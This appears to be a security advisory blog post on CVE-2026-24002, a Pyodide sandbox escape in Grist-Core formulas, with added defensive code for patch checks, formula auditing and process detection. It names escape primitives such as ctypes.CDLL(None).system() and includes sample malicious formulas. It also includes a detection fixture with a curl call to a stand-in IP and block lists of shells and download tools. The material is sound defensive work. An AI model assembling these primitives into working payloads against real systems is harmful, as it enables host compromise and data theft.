
CVE-2026-24002: Critical Grist-Core Vulnerability Enables Remote Code Execution via Spreadsheet Formula Sandbox Escape

  • Rescana
  • 5 minutes ago
  • 4 min read

Executive Summary

A critical vulnerability, CVE-2026-24002 (dubbed "Cellbreak"), has been identified in Grist-Core, a widely used programmable spreadsheet platform. This flaw enables remote code execution (RCE) through malicious spreadsheet formulas, allowing attackers to escape the Pyodide sandbox and execute arbitrary operating system commands or JavaScript on the host. Both SaaS and self-hosted deployments of Grist-Core are at risk. The vulnerability’s high severity (CVSS 9.1) and ease of exploitation make it a significant threat, with the potential to expose sensitive data, compromise credentials, and facilitate lateral movement within affected environments. Immediate action is required to mitigate the risk, especially for organizations relying on collaborative or automated spreadsheet workflows.

Technical Information

CVE-2026-24002 is a sandbox escape vulnerability in Grist-Core’s formula engine, which leverages the Pyodide (WebAssembly-based Python) runtime to execute user-supplied Python code within spreadsheet cells. The intended security boundary is the Pyodide sandbox, but researchers at Cyera Research Labs discovered that this isolation can be bypassed through several advanced exploitation techniques.

The vulnerability stems from incomplete sandboxing of the Python execution environment. Attackers can exploit Python’s introspective capabilities and the availability of certain modules to traverse the object hierarchy, access sensitive built-ins, and ultimately invoke system-level functions. The most critical exploitation vectors include:

  • Attackers can use Python’s object model to access the __builtins__ namespace, import the os module, and invoke os.system() to execute arbitrary shell commands. This is possible because the Pyodide sandbox does not sufficiently restrict access to these core Python features.
  • The ctypes module, which provides C-compatible data types and allows calling functions in DLLs or shared libraries, is accessible within the sandbox. By invoking ctypes.CDLL(None).system(), an attacker can directly call the system’s libc system() function, bypassing Python-level restrictions.
  • The Emscripten runtime, which underpins Pyodide, exposes functions such as emscripten_run_script_string(). This allows attackers to execute arbitrary JavaScript in the context of the host environment, potentially enabling further exploitation such as invoking Node.js modules (e.g., require('child_process')) for deeper system compromise.

A proof-of-concept exploit demonstrates that a single malicious spreadsheet formula can trigger these vectors, resulting in full host compromise. The attack can be delivered via spreadsheet file upload, formula injection, or collaborative editing, making it difficult to distinguish from legitimate user activity.

The impact of successful exploitation is severe. Attackers can access environment variables, configuration files, and sensitive data stored on the host. In multi-tenant SaaS deployments, a single exploit can compromise the vendor’s control plane, affecting all customers. The ability to execute arbitrary code also enables attackers to establish persistence, escalate privileges, and move laterally within the network.

Exploitation in the Wild

As of the latest intelligence, there are no confirmed reports of active exploitation in the wild. However, public proof-of-concept code and detailed technical write-ups are readily available, significantly lowering the barrier to exploitation. Security researchers and the broader infosec community have discussed the vulnerability extensively on platforms such as Reddit, The Hacker News, and Infosecurity Magazine. The availability of exploit code and the high-profile nature of the vulnerability increase the likelihood of opportunistic and targeted attacks in the near future.

Organizations in sectors such as government, higher education, and commercial SaaS have been identified as particularly at risk, given their reliance on collaborative spreadsheet platforms and the prevalence of Grist-Core in these environments. The attack surface is broad, encompassing both cloud-hosted and on-premises deployments.

APT Groups using this vulnerability

At this time, there is no public attribution of CVE-2026-24002 exploitation to specific Advanced Persistent Threat (APT) groups. However, the techniques enabled by this vulnerability—remote code execution via document-based payloads, sandbox escape, and lateral movement—are consistent with the tradecraft of APTs targeting SaaS, automation platforms, and organizations with collaborative workflows. The MITRE ATT&CK techniques mapped to this vulnerability include T1059.006 (Command and Scripting Interpreter: Python), T1203 (Exploitation for Client Execution), T1071 (Application Layer Protocol for exfiltration), and T1569.002 (System Services: Service Execution). Given the criticality and potential impact, it is highly likely that both financially motivated and state-sponsored actors will seek to weaponize this vulnerability.

Affected Product Versions

The vulnerability affects all versions of Grist-Core prior to 1.7.9. This includes both SaaS and self-hosted deployments. The issue is resolved in Grist-Core version 1.7.9 and later, where formula execution is isolated using the Deno runtime, which enforces a stricter permission model and blocks sensitive operations by default.

Organizations running any version of Grist-Core earlier than 1.7.9 are at risk. It is critical to note that even after upgrading, if the environment variable GRIST_PYODIDE_SKIP_DENO is set to 1, the patch is bypassed and the system remains vulnerable. Therefore, both version and configuration must be verified to ensure effective mitigation.

Workaround and Mitigation

The primary mitigation is to upgrade to Grist-Core version 1.7.9 or later. This release introduces Deno-based isolation for Pyodide formula execution, leveraging Deno’s permission model to block unauthorized system access. After upgrading, administrators must ensure that the environment variable GRIST_PYODIDE_SKIP_DENO is not set to 1, as this disables the new security controls and leaves the system exposed.
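The advisory makes the point twice, under Affected Product Versions and again here: a deployment is protected only if the version is 1.7.9 or later and GRIST_PYODIDE_SKIP_DENO is not set to 1. The check below is an added example, not Rescana's or Grist's own code. It takes the running version string and the service's environment as inputs; the fixed version and the bypass variable are taken from the advisory, and the inputs in the demo are constructed.

```python
"""Verify that a Grist-Core deployment is actually protected against CVE-2026-24002.

Added example, not Rescana's or Grist's code. Both conditions come from the
advisory: the fix ships in 1.7.9, and GRIST_PYODIDE_SKIP_DENO=1 turns the fix
back off. The version strings and environments used in the demo are constructed.
"""
import os
import re

FIXED_VERSION = (1, 7, 9)                  # first release with Deno isolation (advisory)
BYPASS_VAR = "GRIST_PYODIDE_SKIP_DENO"     # value "1" disables the Deno layer (advisory)


def parse_version(text):
    """Turn '1.7.9' or 'v1.7.10' (optionally with a -suffix) into a comparable tuple.

    Raises ValueError for anything that is not three dotted integers, so an
    unknown or empty version string is never silently treated as patched."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:[-+].*)?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Grist-Core version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def assess(version, env):
    """Classify a deployment from its version and its service environment.

    Returns (status, reason) where status is 'vulnerable' (needs the upgrade),
    'misconfigured' (upgraded but the bypass variable is set) or 'patched'.
    `env` is a mapping such as os.environ read in the Grist service's context."""
    if parse_version(version) < FIXED_VERSION:
        return "vulnerable", f"Grist-Core {version} predates 1.7.9; upgrade required"
    if env.get(BYPASS_VAR, "").strip() == "1":
        return "misconfigured", f"{BYPASS_VAR}=1 disables Deno isolation; unset it and restart"
    return "patched", f"Grist-Core {version} with Deno isolation in effect"


if __name__ == "__main__":
    # Constructed inputs; in practice read the version from the running service
    # and the environment from its process (unit file, container spec, /proc).
    for ver, env in [("1.7.8", {}), ("1.7.9", {BYPASS_VAR: "1"}), ("1.7.10", {})]:
        status, reason = assess(ver, env)
        print(f"{ver:8} {status:13} {reason}")
    print("current shell environment:", assess("1.7.9", os.environ))
```

Because the version check compares tuples rather than strings, 1.7.10 correctly sorts after 1.7.9; an unparseable version string raises instead of passing, which is the safer failure for a patch-verification step.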

In addition to patching, organizations should restrict formula creation and modification privileges to trusted users only. All imported or uploaded spreadsheets should be audited for suspicious or complex Python formulas, particularly those that reference built-in modules, ctypes, or unusual object traversal patterns. Running Grist-Core under the principle of least privilege (limiting the service's access to sensitive environment variables, files, and network resources) further reduces the potential impact of exploitation.
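A static triage pass for the formula audit described above, as an added example that is neither Rescana's nor part of Grist-Core. It parses each stored formula with Python's standard `ast` module and flags the patterns the advisory names: imports of os or ctypes, use of the builtins namespace or dynamic import, dunder attribute traversal of the object hierarchy, and calls into the Emscripten bridge. It assumes the formulas have been exported as Python source keyed by Table.Column; Grist's `$Column` shorthand is rewritten to `rec.Column` and the body wrapped in a function before parsing, which is assumed here to mirror Grist's own preparation of a formula. The sample formulas are constructed.

```python
"""Static triage of Grist formulas for the patterns named in the advisory.

Added example, not Rescana's or Grist-Core's code. Input is the Python source
of each formula, keyed by Table.Column; the samples below are constructed.
"""
import ast
import re
import textwrap

# Modules a cell formula has no legitimate reason to import (os and ctypes per
# the advisory; the others are assumed extensions of the same idea).
SENSITIVE_MODULES = {"os", "ctypes", "subprocess", "sys", "importlib", "pyodide", "js"}
# Names that hand out the builtins namespace or dynamic import/eval.
SENSITIVE_NAMES = {"__builtins__", "__import__", "eval", "exec", "compile", "globals"}


def _wrap(source):
    """Rewrite Grist's $Column shorthand to rec.Column and wrap the body in a
    function so that multi-line formulas using `return` parse. Assumption:
    this mirrors how Grist prepares a formula before executing it."""
    body = re.sub(r"\$([A-Za-z_]\w*)", r"rec.\1", source)
    return "def _formula(rec):\n" + textwrap.indent(body, "    ")


def scan_formula(source):
    """Return a list of findings for one formula; an empty list means nothing flagged.
    Unparseable formulas are reported rather than skipped."""
    findings = []
    try:
        tree = ast.parse(_wrap(source))
    except SyntaxError as exc:
        return [f"unparseable formula ({exc.msg})"]
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SENSITIVE_MODULES:
                    findings.append(f"imports sensitive module {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in SENSITIVE_MODULES:
                findings.append(f"imports from sensitive module {node.module}")
        elif isinstance(node, ast.Attribute):
            # rec.__class__.__mro__ style traversal of the object hierarchy
            if node.attr.startswith("__") and node.attr.endswith("__"):
                findings.append(f"dunder attribute traversal via .{node.attr}")
        elif isinstance(node, ast.Name):
            if node.id in SENSITIVE_NAMES:
                findings.append(f"references {node.id}")
            elif node.id in SENSITIVE_MODULES:
                findings.append(f"references module name {node.id}")
        elif isinstance(node, ast.Call):
            # The Emscripten bridge functions are reached as plain calls
            if isinstance(node.func, ast.Name) and node.func.id.startswith("emscripten_"):
                findings.append(f"calls Emscripten bridge {node.func.id}")
    return findings


def audit_document(formulas):
    """formulas: {'Table.Column': source}. Returns only the entries with findings."""
    report = {}
    for key, source in formulas.items():
        findings = scan_formula(source)
        if findings:
            report[key] = findings
    return report


# Constructed sample document: two ordinary formulas and three that match the
# advisory's description of the exploitation vectors.
SAMPLE_FORMULAS = {
    "Orders.Total": "$Price * $Quantity",
    "Orders.Label": "'%s x%d' % ($Name, $Quantity)",
    "Orders.Probe": "$Name.__class__.__mro__",
    "Orders.Shell": "ctypes.CDLL(None).system('<command>')",
    "Orders.Env": "__import__('os').environ",
}

if __name__ == "__main__":
    for key, findings in audit_document(SAMPLE_FORMULAS).items():
        print(key)
        for finding in findings:
            print("   -", finding)
```

Walking the syntax tree rather than grepping the source means an attribute chain is caught however it is spaced or split across lines, and a formula that does not parse is surfaced for review instead of being silently passed.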

Continuous monitoring for indicators of compromise is essential. These include unusual outbound network connections from Grist-Core hosts, unexpected processes spawned by the Grist service user, and access logs showing uploads or imports of untrusted spreadsheets. Automated detection rules and behavioral analytics can help identify early signs of exploitation.
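A detection rule for one of the indicators listed above, unexpected processes spawned by the Grist service user, as an added example and not Rescana's or Grist's own detection content. It assumes a process-creation feed (an EDR or auditd export) already normalised to JSON lines with the fields shown, and that the service runs as a dedicated account named `grist`; the events, account name and binary paths are constructed for the example.

```python
"""Flag unexpected child processes of the Grist service account.

Added example, not Rescana's or Grist-Core's detection content. Assumes a
process-creation feed already normalised to JSON lines with the fields below;
the service user name, paths and events are constructed for the example.
"""
import json

SERVICE_USER = "grist"                                  # assumed service account
# Binaries the service legitimately runs or spawns (assumption; tune per deployment).
EXPECTED_BINARIES = {"/usr/bin/node", "/usr/bin/deno"}
# Shells, interpreters and download tools: high severity under the service user.
HIGH_RISK_BINARIES = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/python3",
                      "/usr/bin/perl", "/usr/bin/curl", "/usr/bin/wget"}

# Constructed events: a normal sandbox worker, an unrelated cron job, and a shell
# plus downloader chain under the service account that should be flagged.
SAMPLE_EVENTS = """\
{"ts": "2026-01-20T10:00:01Z", "user": "grist", "pid": 1201, "ppid": 1200, "exe": "/usr/bin/node", "parent_exe": "/usr/bin/node", "cmdline": "node sandbox worker"}
{"ts": "2026-01-20T10:00:05Z", "user": "root", "pid": 1300, "ppid": 1, "exe": "/bin/sh", "parent_exe": "/usr/sbin/cron", "cmdline": "sh -c logrotate"}
{"ts": "2026-01-20T10:02:10Z", "user": "grist", "pid": 1402, "ppid": 1201, "exe": "/bin/sh", "parent_exe": "/usr/bin/node", "cmdline": "sh -c <redacted>"}
{"ts": "2026-01-20T10:02:11Z", "user": "grist", "pid": 1403, "ppid": 1402, "exe": "/usr/bin/curl", "parent_exe": "/bin/sh", "cmdline": "curl http://203.0.113.10/"}
"""


def parse_events(text):
    """Parse JSON-lines process events; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_unexpected_children(events, service_user=SERVICE_USER):
    """Return one alert per process run by the service user that is not an
    expected binary. Severity is 'high' for shells, interpreters and download
    tools, 'medium' otherwise. Each event is judged on its own fields, so the
    descendants of a flagged shell (the curl above) are reported as well."""
    alerts = []
    for ev in events:
        if ev.get("user") != service_user:
            continue
        exe = ev.get("exe", "")
        if exe in EXPECTED_BINARIES:
            continue
        alerts.append({
            "ts": ev["ts"],
            "pid": ev["pid"],
            "exe": exe,
            "parent_exe": ev.get("parent_exe"),
            "severity": "high" if exe in HIGH_RISK_BINARIES else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_unexpected_children(parse_events(SAMPLE_EVENTS)):
        print(f"[{alert['severity']}] {alert['ts']} pid={alert['pid']} "
              f"{alert['parent_exe']} -> {alert['exe']}")
```

The rule is an allowlist, not a denylist: anything the service account runs that is not node or deno is reported, and the high-risk set only raises severity. A real deployment will need the allowlist adjusted to its own sandbox layout, and the same event feed can be joined with outbound connection logs to cover the exfiltration indicator.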

Rescana is here for you

Rescana is committed to helping organizations manage third-party risk and maintain robust cybersecurity postures. Our TPRM platform provides continuous monitoring, automated risk assessment, and actionable insights to help you stay ahead of emerging threats. We encourage all customers to review their exposure to Grist-Core and other collaborative platforms, and to implement the recommended mitigations promptly. For any questions, incident response needs, or further guidance, our cybersecurity team is available at ops@rescana.com.
